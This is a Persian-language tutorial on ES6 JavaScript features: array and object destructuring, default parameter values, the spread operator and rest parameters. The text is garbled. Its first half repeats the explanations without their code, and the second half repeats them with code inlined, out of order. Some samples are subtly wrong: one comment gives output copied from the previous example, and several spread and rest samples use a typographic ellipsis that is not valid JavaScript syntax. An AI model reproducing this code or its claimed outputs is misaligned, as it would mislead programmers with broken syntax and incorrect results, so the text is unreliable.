در این مثال پارامترهای min و max تعریف شدهی با Destructuring، دارای یک مقدار پیش فرض هستند. اگر شیءایی خالی را به این متد ارسال کنیم، از مقادیر پیش فرض استفاده خواهد شد و یا اگر max را مقدار دهی کنیم، مقدار min، از مقدار پیش فرض آن دریافت میگردد.
و یا اینبار jQuery Ajax را میتوان با پارامترهای پیش فرض آن به صورت ذیل خلاصه نویسی کرد:
همچنین اینبار امکان شبیه سازی دریافت چندین خروجی از متد، به نحو سادهتر و واضحتری میسر است:
در ابتدا، متدی تعریف شدهاست که یک آرایهی معمولی را بازگشت میدهد. اما با استفاده از Destructuring میتوان چندین خروجی با معنا را در طی یک سطر، از آن دریافت کرد.
شبیه به همین مورد در حین کار با اشیاء نیز میسر است:
متدی که یک شیء را بر میگرداند و با استفاده از Destructuring، خروجی آن به دو متغیر جدید، انتساب داده شدهاند.
تعریف مقادیر پیش فرض در حین Destructuring
در انتساب ذیل، چون شیء سمت راست، دارای خاصیت foo نیست، مقدار این پارامتر جدید undefined خواهد بود. برای رفع این مشکل میتوان به آن مقدار پیش فرضی را نیز نسبت داد:
چند مثال دیگر:
اگر مقدار پیش فرض، ذکر شود و خاصیت متناظر با آن دارای مقدار باشد، از همان مقدار اصلی ذکر شده استفاده میشود:
اما اگر این مقدار undefined باشد، به مقدار پیش فرض سوئیچ خواهد شد:
این مورد در حین کار با آرایهها نیز برقرار است:
ES6 — default + rest + spread
علاوه بر destructuring، سه قابلیت و بهبود دیگر نیز در زمینهی کار با متغیرها و پارامترها به ES 6 اضافه شدهاند:
1) امکان تعریف مقادیر پیش فرض پارامترها
در جاوا اسکریپت، الزامی برای فراخوانی و ذکر تمام پارامترهای یک متد وجود ندارد. برای نمونه در مثال فوق میتوان متد inc را با یک و یا دو پارامتر فراخوانی کرد. در حالتیکه پارامتری ذکر نشود، مقدار آن تعریف نشده خواهد بود و روش برخورد با آن استفاده از عملگر || برای تعریف مقداری پیش فرض است. برای بهبود این وضعیت در ES 6، امکان تعریف مقدار پیش فرض پارامترها نیز درنظر گرفته شدهاست:
در ES 6 امکان تعریف پارامترهایی با مقادیر پیش فرض، پیش از پارامترهایی که دارای مقادیر پیش فرض نیستند نیز میسر است (برخلاف زبان سیشارپ که چنین اجازهای را نمیدهد):
همچنین در حین تعریف این مقدار پیش فرض، میتوان از مقادیر غیر ثابت هم استفاده کرد (باز هم برخلاف سیشارپ). برای نمونه در مثال ذیل، خروجی یک متد، به عنوان مقدار پیش فرض پارامتری تعریف شدهاست:
2) Spread
متد جمع زیر را درنظر بگیرید:
روش متداول فراخوانی آن، ذکر تک تک آرگومانهای آن به ترتیب است. اما با استفاده از عملگر spread اضافه شده به ES 6 که با سه نقطه بیان میشود، میتوان نوشت:
عملگر spread اجازهی بسط و پخش شدن اعضای یک آرایه را به پارامترهای متناظر با آنها میدهد. به علاوه امکان ترکیب این روش، با روش متداول ذکر صریح آرگومانها نیز وجود دارد:
در این مثال، آرایهی مدنظر تنها دو عضو دارد و متد sum دارای سه پارامتر است. با استفاده از عملگر spread، دو پارامتر اول متد به صورت خودکار از آرایه واکشی شده و جایگزین میشوند. آرگومان سوم هم به صورت متداولی ذکر شدهاست.
مثالهایی از ساده سازی اعمال متداول در ES 5 (جاوا اسکریپت فعلی) با کمک ES 6:
الف) ترکیب spread و Destructuring
معادل Destructuring ذیل است:
ب) ساده سازی کار با concat
بجای
میتوان نوشت:
ج) افزودن یک رنج به یک آرایه
بجای
میتوان نوشت:
3) Rest
جاوا اسکریپت دارای شیءایی است به نام arguments که توسط آن میتوان به لیست پارامترهای یک متد دسترسی یافت. برای نمونه مثال ذیل را درنظر بگیرید:
در اینجا به ظاهر متد sum دارای پارامتری نیست. اما با استفاده از شیء arguments، میتوان هر تعداد آرگومانی را برای آن متصور شد و فراخوانیها ذیل کاملا مجاز هستند:
اما مشکل اینجا است که به ظاهر متد sum، هیچ پارامتری را قبول نمیکند و هدف از تعریف آن واضح نیست. برای رفع این مشکل، در ES 6 عملگر rest معرفی شدهاست که بسیار شبیه به عملگر spread است:
در اینجا عملگر سه نقطهای rest که به عنوان پارامتر متد معرفی شدهاست، بیانگر امکان دریافت لیستی از آرگومانها، توسط متد sum است. به این ترتیب، تعریف این متد که تعداد آرگومانهای متغیری را میپذیرد، وضوح بیشتری پیدا کردهاست.
در اینجا باید دقت داشت که پس از ذکر rest، دیگر نمیتوان پارامتری را تعریف کرد:
Destructuring Arrays
بدون استفاده از Destructuring assignment برای دسترسی به اعضای یک آرایه و انتساب آنها به متغیرهای مختلف، روش متداول زیر مرسوم است:
var first = someArray[0]; var second = someArray[1]; var third = someArray[2];
var [first, second, third] = someArray;
یک مثال:
let [one, two, three] = ['globin', 'ghoul', 'ghost', 'white walker']; console.log(`one is ${one}, two is ${two}, three is ${three}`) // => one is globin, two is ghoul, three is ghost
همچنین در این مثال اگر علاقمند بودیم صرفا به اعضای اول و چهارم این آرایه دسترسی پیدا کنیم، میتوان نوشت:
let [firstMonster, , , fourthMonster] = ['globin', 'ghoul', 'ghost', 'white walker']; console.log(`the first monster is ${firstMonster}, the fourth is ${fourthMonster}`) // => one is globin, two is ghoul, three is ghost
امکان دسترسی به اعضای تو در تو نیز با Destructuring assignment پیش بینی شدهاست:
let nested = [1, [2, 3], 4]; let [a, [b], d] = nested; console.log(a); // 1 console.log(b); // 2 console.log(d); // 4
میتوان از Destructuring assignment جهت جابجایی مقادیر متغیرها بدون انتساب به یک متغیر موقتی نیز استفاده کرد:
let point = [1, 2]; let [xVal, yVal] = point; [xVal, yVal] = [yVal, xVal]; console.log(xVal); // 2 console.log(yVal); // 1
Destructuring Objects
امکانات Destructuring assignment، به کار با آرایهها محدود نمیشود و از آن میتوان برای کار با اشیاء نیز استفاده کرد. فرض کنید شیء pouch به صورت زیر تعریف شدهاست:
let pouch = {coins: 10};
let coins = pouch.coins;
let {coins} = pouch;
let pouch = {coins: 10}; let {coins: newVar1 } = pouch; console.log(newVar1); //10
در اینجا نیز امکان کار با اشیای تو در تو، پیش بینی شدهاست:
let point = { x: 1, y: 2, z: { one: 3, two: 4 } }; let { x: a, y: b, z: { one: c, two: d } } = point; console.log(a); // 1 console.log(b); // 2 console.log(c); // 3 console.log(d); // 4
در انتساب فوق، خاصیت x شیء point به متغیر جدید a، خاصیت y شیء point به متغیر جدید b و خاصیت one شیء منتسب به خاصیت z، به متغیر c و خاصیت two شیء منتسب به خاصیت z، به متغیر d انتساب یافتهاند.
ترکیب Destructuring Objects و Destructuring Arrays
در مثال زیر، نمونهای ترکیبی از Destructuring اشیاء و آرایهها را با هم مشاهده میکنید:
let mixed = { one: 1, two: 2, values: [3, 4, 5] }; let { one: a, two: b, values: [c, , e] } = mixed; console.log(a); // 1 console.log(b); // 2 console.log(c); // 3 console.log(e); // 5
Destructuring Function Arguments
از Destructuring در حین تعریف پارامترهای متدها نیز میتوان استفاده کرد.
function removeBreakpoint({ url, line, column }) { // ... }
و یا برای مثال در زبان #C امکان تعریف named arguments (آرگومانهای نامدار) و همچنین تعریف مقادیر پیش فرضی برای آنها وجود دارد. در اینجا نیز میتوان با استفاده از Destructuring به تعریفی مشابه آن برای ارائهی آرگومانهایی با مقادیر پیش فرض رسید:
function random ({ min=1, max=300 }) { return Math.floor(Math.random() * (max - min)) + min } console.log(random({})) // <- 174 console.log(random({max: 24})) // <- 18
و یا اینبار jQuery Ajax را میتوان با پارامترهای پیش فرض آن به صورت ذیل خلاصه نویسی کرد:
jQuery.ajax = function (url, { async = true, beforeSend = noop, cache = true, complete = noop, crossDomain = false, global = true, // ... more config }) { // ... do stuff };
function returnMultipleValues() { return [1, 2]; } var [foo, bar] = returnMultipleValues();
شبیه به همین مورد در حین کار با اشیاء نیز میسر است:
function returnMultipleValues() { return { foo: 1, bar: 2 }; } var { foo, bar } = returnMultipleValues();
تعریف مقادیر پیش فرض در حین Destructuring
در انتساب ذیل، چون شیء سمت راست، دارای خاصیت foo نیست، مقدار این پارامتر جدید undefined خواهد بود. برای رفع این مشکل میتوان به آن مقدار پیش فرضی را نیز نسبت داد:
var {foo=3} = { bar: 2 } console.log(foo) // <- 3
اگر مقدار پیش فرض، ذکر شود و خاصیت متناظر با آن دارای مقدار باشد، از همان مقدار اصلی ذکر شده استفاده میشود:
var {foo=3} = { foo: 2 } console.log(foo) // <- 2
var {foo=3} = { foo: undefined } console.log(foo) // <- 3
var [b=10] = [undefined] console.log(b) // <- 10 var [c=10] = [] console.log(c) // <- 10
ES6 — default + rest + spread
علاوه بر destructuring، سه قابلیت و بهبود دیگر نیز در زمینهی کار با متغیرها و پارامترها به ES 6 اضافه شدهاند:
1) امکان تعریف مقادیر پیش فرض پارامترها
function inc(number, increment) { increment = increment || 1; return number + increment; } console.log(inc(2, 2)); // 4 console.log(inc(2)); // 3
function inc(number, increment = 1) { return number + increment; } console.log(inc(2, 2)); // 4 console.log(inc(2)); // 3
function sum(a, b = 2, c) { return a + b + c; } console.log(sum(1, 5, 10)); // 16 -> b === 5 console.log(sum(1, undefined, 10)); // 13 -> b as default
function getDefaultIncrement() { return 1; } function inc(number, increment = getDefaultIncrement()) { return number + increment; } console.log(inc(2, 2)); // 4 console.log(inc(2)); // 3
2) Spread
متد جمع زیر را درنظر بگیرید:
function sum(a, b, c) { return a + b + c; }
var args = [1, 2, 3]; console.log(sum(…args)); // 6
var args = [1, 2]; console.log(sum(…args, 3)); // 6
مثالهایی از ساده سازی اعمال متداول در ES 5 (جاوا اسکریپت فعلی) با کمک ES 6:
الف) ترکیب spread و Destructuring
a = list[0], rest = list.slice(1)
[a, ...rest] = list
ب) ساده سازی کار با concat
بجای
[1, 2].concat(more)
[1, 2, ...more]
ج) افزودن یک رنج به یک آرایه
بجای
list.push.apply(list, [3, 4])
list.push(...[3, 4])
3) Rest
جاوا اسکریپت دارای شیءایی است به نام arguments که توسط آن میتوان به لیست پارامترهای یک متد دسترسی یافت. برای نمونه مثال ذیل را درنظر بگیرید:
function sum() { var numbers = Array.prototype.slice.call(arguments), result = 0; numbers.forEach(function (number) { result += number; }); return result; }
console.log(sum(1)); // 1 console.log(sum(1, 2, 3, 4, 5)); // 15
function sum(…numbers) { var result = 0; numbers.forEach(function (number) { result += number; }); return result; } console.log(sum(1)); // 1 console.log(sum(1, 2, 3, 4, 5)); // 15
در اینجا باید دقت داشت که پس از ذکر rest، دیگر نمیتوان پارامتری را تعریف کرد:
function sum(…numbers, last) { // causes a syntax error
اشتراکها